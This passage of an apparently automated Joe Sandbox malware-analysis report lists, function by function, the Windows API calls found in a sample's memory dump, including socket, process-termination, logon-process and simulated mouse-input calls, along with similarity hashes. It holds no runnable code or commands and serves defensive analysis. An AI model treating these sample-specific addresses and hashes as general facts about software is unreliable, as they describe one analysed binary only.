GetMenuItemCount.USER32(00000000), ref: 00688577
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0068859F
GetMenuItemID.USER32(?,?), ref: 0068860E
GetSubMenu.USER32(?,?), ref: 0068861C
PostMessageW.USER32(?,00000111,?,00000000), ref: 0068866D

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: f6dec043af5a35767639493d07f5ec253978c60e60f01e6ccda5a92c7b88f53c
Instruction ID: 2d58a69058c80f5f945c8f6236d8a5ecbe1c8d2f2a4e5efcc5c013724c7d2741
Opcode Fuzzy Hash: f6dec043af5a35767639493d07f5ec253978c60e60f01e6ccda5a92c7b88f53c
Instruction Fuzzy Hash: B9518B71E00625AFCB51EFA4C841AEEB7F6EF48310F104599E916BB351DB30AE418F95

Function 00664AC2 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00664B10
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00664B5B
IsMenu.USER32(00000000), ref: 00664B7B
CreatePopupMenu.USER32 ref: 00664BAF
GetMenuItemCount.USER32(000000FF), ref: 00664C0D
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00664C3E

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 1dc8f433bf4a37a7bc5764920242e9a76588426fe349d0dac16252ec41c61fdd
Instruction ID: 477705b9b050608043c9db708151db3d5cc8a7400e33566d61c28d7adab89c5f
Opcode Fuzzy Hash: 1dc8f433bf4a37a7bc5764920242e9a76588426fe349d0dac16252ec41c61fdd
Instruction Fuzzy Hash: 3551FE70A02209EFCF25CF68C888BEEBBF6AF45318F148159E4259B391EB709D44CB51

Function 00678DE2 Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON

Download Yara Rule

APIs

select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00678E7C
WSAGetLastError.WSOCK32(00000000), ref: 00678E89
__WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00678EAD
#16.WSOCK32(?,?,00000000,00000000), ref: 00678EC5
_strlen.LIBCMT ref: 00678EF7
WSAGetLastError.WSOCK32(00000000), ref: 00678F6A

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: ErrorLast$_strlenselect
String ID:
API String ID: 2217125717-0
Opcode ID: 405bc44b3e118090553274be1299b080e295526eab02cef92a1fcb809f7a685b
Instruction ID: 2b53d5a0bae012429a7175e435184cbebcf703db0516080e5650a1a6d9603c59
Opcode Fuzzy Hash: 405bc44b3e118090553274be1299b080e295526eab02cef92a1fcb809f7a685b
Instruction Fuzzy Hash: 5C41AE71500204AFCB58EBA4DD89EEEB7BBAF48350F10825DF51A97291DF30AE40CB64

Function 0063ABF5 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 0063B34E: GetWindowLongW.USER32(?,000000EB), ref: 0063B35F

BeginPaint.USER32(?,?,?), ref: 0063AC2A
GetWindowRect.USER32(?,?), ref: 0063AC8E
ScreenToClient.USER32(?,?), ref: 0063ACAB
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0063ACBC
EndPaint.USER32(?,?,?,?,?), ref: 0063AD06
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0069E673

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
String ID:
API String ID: 2592858361-0
Opcode ID: ebacdbf333bbd0529e8599527c2091f9b31f372aaa35c0e3a9c1ba98e42fb8c5
Instruction ID: 3d25c0f845e5d2091e46403fb2f16bfea2a81d04aab27c27c05561df73a216b8
Opcode Fuzzy Hash: ebacdbf333bbd0529e8599527c2091f9b31f372aaa35c0e3a9c1ba98e42fb8c5
Instruction Fuzzy Hash: 0B41B2701043009FC710DF64CC84FB67BEAEB5A720F14166DF9A58B2A1D731A945EBA2

Function 0068E397 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(006E1628,00000000,006E1628,00000000,00000000,006E1628,?,0069DC5D,00000000,?,00000000,00000000,00000000,?,0069DAD1,00000004), ref: 0068E40B
EnableWindow.USER32(00000000,00000000), ref: 0068E42F
ShowWindow.USER32(006E1628,00000000), ref: 0068E48F
ShowWindow.USER32(00000000,00000004), ref: 0068E4A1
EnableWindow.USER32(00000000,00000001), ref: 0068E4C5
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0068E4E8

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 9df7b9ee3fa219420067c7502354be30e33f66623fd92ab94ae5b8f5661c077c
Instruction ID: 8db79d3be072b72d4769000e4440133738216f65b5b5023ee3fe456db259a91b
Opcode Fuzzy Hash: 9df7b9ee3fa219420067c7502354be30e33f66623fd92ab94ae5b8f5661c077c
Instruction Fuzzy Hash: F7415034601141EFDB26EF24C499FD47BE2BF09304F5882A9EA5D8F6A2C772E845CB51

Function 006698BA Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 006698D1

Part of subcall function 0063F4EA: std::exception::exception.LIBCMT ref: 0063F51E
Part of subcall function 0063F4EA: __CxxThrowException@8.LIBCMT ref: 0063F533

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00669908
EnterCriticalSection.KERNEL32(?), ref: 00669924
LeaveCriticalSection.KERNEL32(?), ref: 0066999E
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 006699B3
InterlockedExchange.KERNEL32(?,000001F6), ref: 006699D2

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 2537439066-0
Opcode ID: ddd2ef341663a8902a2511f262647d508a200ea6f657fea0e92fbd5140ea2614
Instruction ID: 31cf342e2f0784cb8577bf5626a1e39aa5778dd0f6bb72b0096ef056f3b1c0fd
Opcode Fuzzy Hash: ddd2ef341663a8902a2511f262647d508a200ea6f657fea0e92fbd5140ea2614
Instruction Fuzzy Hash: 05318131900205EBDB50EF94DC85EAEB7BAFF45710F1480A9F905AB246D734EE10CBA4

Function 00679B45 Relevance: 9.1, APIs: 6, Instructions: 99COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,006777F4,?,?,00000000,00000001), ref: 00679B53

Part of subcall function 00676544: GetWindowRect.USER32(?,?), ref: 00676557

GetDesktopWindow.USER32 ref: 00679B7D
GetWindowRect.USER32(00000000), ref: 00679B84
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00679BB6

Part of subcall function 00667A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00667AD0

GetCursorPos.USER32(?), ref: 00679BE2
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00679C44

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 0b1816838a1b32a20440e01a07f0e1ae104f2ec95aafc7a298a42a242bbafb83
Instruction ID: 8dc2ba17fbf936b8390ead41a8dae9f117644dfd43b8894968a15e43131be572
Opcode Fuzzy Hash: 0b1816838a1b32a20440e01a07f0e1ae104f2ec95aafc7a298a42a242bbafb83
Instruction Fuzzy Hash: 8931D072504305ABD710EF54DC49F9BB7EAFF89314F00092AF589D7291DA71EA08CBA2

Function 0065AF64 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0065AFAE
OpenProcessToken.ADVAPI32(00000000), ref: 0065AFB5
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 0065AFC4
CloseHandle.KERNEL32(00000004), ref: 0065AFCF
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0065AFFE
DestroyEnvironmentBlock.USERENV(00000000), ref: 0065B012

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 1e0e11cb14bbd76799caa37ed3320e1e18c3300444021e6632b22d6b4a22a8a7
Instruction ID: 8562553cfe3168b4d497ea221d04f9348d0c0dbd8c9ce3dcd98913a3a171db05
Opcode Fuzzy Hash: 1e0e11cb14bbd76799caa37ed3320e1e18c3300444021e6632b22d6b4a22a8a7
Instruction Fuzzy Hash: 582149B2100209AFDF029FA4DD09BEE7BAAAB45305F044115FE02A2261C376DD29EB61

Function 0068EBF6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 0063AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0063AFE3
Part of subcall function 0063AF83: SelectObject.GDI32(?,00000000), ref: 0063AFF2
Part of subcall function 0063AF83: BeginPath.GDI32(?), ref: 0063B009
Part of subcall function 0063AF83: SelectObject.GDI32(?,00000000), ref: 0063B033

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0068EC20
LineTo.GDI32(00000000,00000003,?), ref: 0068EC34
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0068EC42
LineTo.GDI32(00000000,00000000,?), ref: 0068EC52
EndPath.GDI32(00000000), ref: 0068EC62
StrokePath.GDI32(00000000), ref: 0068EC72

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: bbcd0f31d4ea46d79ed38b445903d2c93cc013b44eb515ddb3b155bf2f15063f
Instruction ID: 18d300d29527f9052ba6b213a235ff6a2118256061d78398ab24a01d6b7f3d66
Opcode Fuzzy Hash: bbcd0f31d4ea46d79ed38b445903d2c93cc013b44eb515ddb3b155bf2f15063f
Instruction Fuzzy Hash: 7A111B7240014DBFEF02AF90DC88EEA7F6EEF09354F048116BE1989160D771AE55DBA0

Function 0065E19B Relevance: 9.0, APIs: 6, Instructions: 48COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0065E1C0
GetDeviceCaps.GDI32(00000000,00000058), ref: 0065E1D1
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0065E1D8
ReleaseDC.USER32(00000000,00000000), ref: 0065E1E0
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0065E1F7
MulDiv.KERNEL32(000009EC,?,?), ref: 0065E209

Part of subcall function 00659AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00659A05,00000000,00000000,?,00659DDB), ref: 0065A53A

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: CapsDevice$ExceptionRaiseRelease
String ID:
API String ID: 603618608-0
Opcode ID: 26d4b42785beaf28bf48fc592ccdb26f863af864b5d9216f0073160bc4bd472c
Instruction ID: f3a340edee6fc5feb9403313a42f411017c843076e808a7092235fcdcfb20fba
Opcode Fuzzy Hash: 26d4b42785beaf28bf48fc592ccdb26f863af864b5d9216f0073160bc4bd472c
Instruction Fuzzy Hash: BB018FB5A40614BFEF10AFA6CC45B5EBFBAEB49351F008066EE05A7390D6719D01CFA0

Function 00647B47 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 00647B47

Part of subcall function 0064123A: __initp_misc_winsig.LIBCMT ref: 0064125E
Part of subcall function 0064123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00647F51
Part of subcall function 0064123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00647F65
Part of subcall function 0064123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00647F78
Part of subcall function 0064123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00647F8B
Part of subcall function 0064123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00647F9E
Part of subcall function 0064123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00647FB1
Part of subcall function 0064123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00647FC4
Part of subcall function 0064123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00647FD7
Part of subcall function 0064123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00647FEA
Part of subcall function 0064123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00647FFD
Part of subcall function 0064123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00648010
Part of subcall function 0064123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00648023
Part of subcall function 0064123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00648036
Part of subcall function 0064123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00648049
Part of subcall function 0064123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0064805C
Part of subcall function 0064123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0064806F

__mtinitlocks.LIBCMT ref: 00647B4C

Part of subcall function 00647E23: InitializeCriticalSectionAndSpinCount.KERNEL32(006DAC68,00000FA0,?,?,00647B51,00645E77,006D6C70,00000014), ref: 00647E41

__mtterm.LIBCMT ref: 00647B55

Part of subcall function 00647BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00647B5A,00645E77,006D6C70,00000014), ref: 00647D3F
Part of subcall function 00647BBD: _free.LIBCMT ref: 00647D46
Part of subcall function 00647BBD: DeleteCriticalSection.KERNEL32(006DAC68,?,?,00647B5A,00645E77,006D6C70,00000014), ref: 00647D68

__calloc_crt.LIBCMT ref: 00647B7A
GetCurrentThreadId.KERNEL32 ref: 00647BA3

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
String ID:
API String ID: 2942034483-0
Opcode ID: 2433d9aba240eef7fcd7802c9ddd219f36f8b963e1d9e6661d9b5e9ab8ac4622
Instruction ID: ebbad292b1b2cbe816db4e6f7177dbecf192e0b9ac05b37364cac5fe0880067f
Opcode Fuzzy Hash: 2433d9aba240eef7fcd7802c9ddd219f36f8b963e1d9e6661d9b5e9ab8ac4622
Instruction Fuzzy Hash: C1F0903251D31219E7A47F74BC46A8B2787DF02734B200BAEF964D55E2FF21984145A9

Function 006227EC Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 0062281D
MapVirtualKeyW.USER32(00000010,00000000), ref: 00622825
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00622830
MapVirtualKeyW.USER32(000000A1,00000000), ref: 0062283B
MapVirtualKeyW.USER32(00000011,00000000), ref: 00622843
MapVirtualKeyW.USER32(00000012,00000000), ref: 0062284B

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: f775d17afa69e1e263c5f751d04d1adb0f023cd3be7502e4718c4ae01998a0c0
Instruction ID: 6f3d3b254f384ae59b838ef55b26f64f3abf50771bf3d30c6584a67e31a1c214
Opcode Fuzzy Hash: f775d17afa69e1e263c5f751d04d1adb0f023cd3be7502e4718c4ae01998a0c0
Instruction Fuzzy Hash: 500144B0902B5ABDE3009F6A8C85A52FEA8FF19354F00411BA15C47A42C7B5A864CBE5

Function 00669AD5 Relevance: 9.0, APIs: 6, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 1423608774-0
Opcode ID: b541005bb33ee226cc1cee5310a0f2f931f32b51d74032b2abaf0a6ef0715811
Instruction ID: 32a2a3183d694b7c018ae2c92480d77570185d0d2eb9b9611da9890111ee698e
Opcode Fuzzy Hash: b541005bb33ee226cc1cee5310a0f2f931f32b51d74032b2abaf0a6ef0715811
Instruction Fuzzy Hash: E601A936101211ABD7152B94EC48EEB77AFFF89701704142DFA0396594DB74B900DF60

Function 00667BF7 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00667C07
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00667C1D
GetWindowThreadProcessId.USER32(?,?), ref: 00667C2C
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00667C3B
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00667C45
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00667C4C

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 367e2bfe8ec42159f5703d48497bfe36242408118fe01af83e88392f4bbd1d72
Instruction ID: 7a46fbea8bfe481f39a55c2f0840aa49b386b70e367513da1c647074a94b38b3
Opcode Fuzzy Hash: 367e2bfe8ec42159f5703d48497bfe36242408118fe01af83e88392f4bbd1d72
Instruction Fuzzy Hash: 91F03A72241158BBE7216B529C0EEEF7BBDEFC7B15F041018FA0291591D7A06E41CAB5

Function 00669A20 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00669A33
EnterCriticalSection.KERNEL32(?,?,?,?,00695DEE,?,?,?,?,?,0062ED63), ref: 00669A44
TerminateThread.KERNEL32(?,000001F6,?,?,?,00695DEE,?,?,?,?,?,0062ED63), ref: 00669A51
WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00695DEE,?,?,?,?,?,0062ED63), ref: 00669A5E

Part of subcall function 006693D1: CloseHandle.KERNEL32(?,?,00669A6B,?,?,?,00695DEE,?,?,?,?,?,0062ED63), ref: 006693DB

InterlockedExchange.KERNEL32(?,000001F6), ref: 00669A71
LeaveCriticalSection.KERNEL32(?,?,?,?,00695DEE,?,?,?,?,?,0062ED63), ref: 00669A78

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 6b59e282a7158498f9a7f87f0072fec7fd17cd64ae0a5b94b314208c726f7631
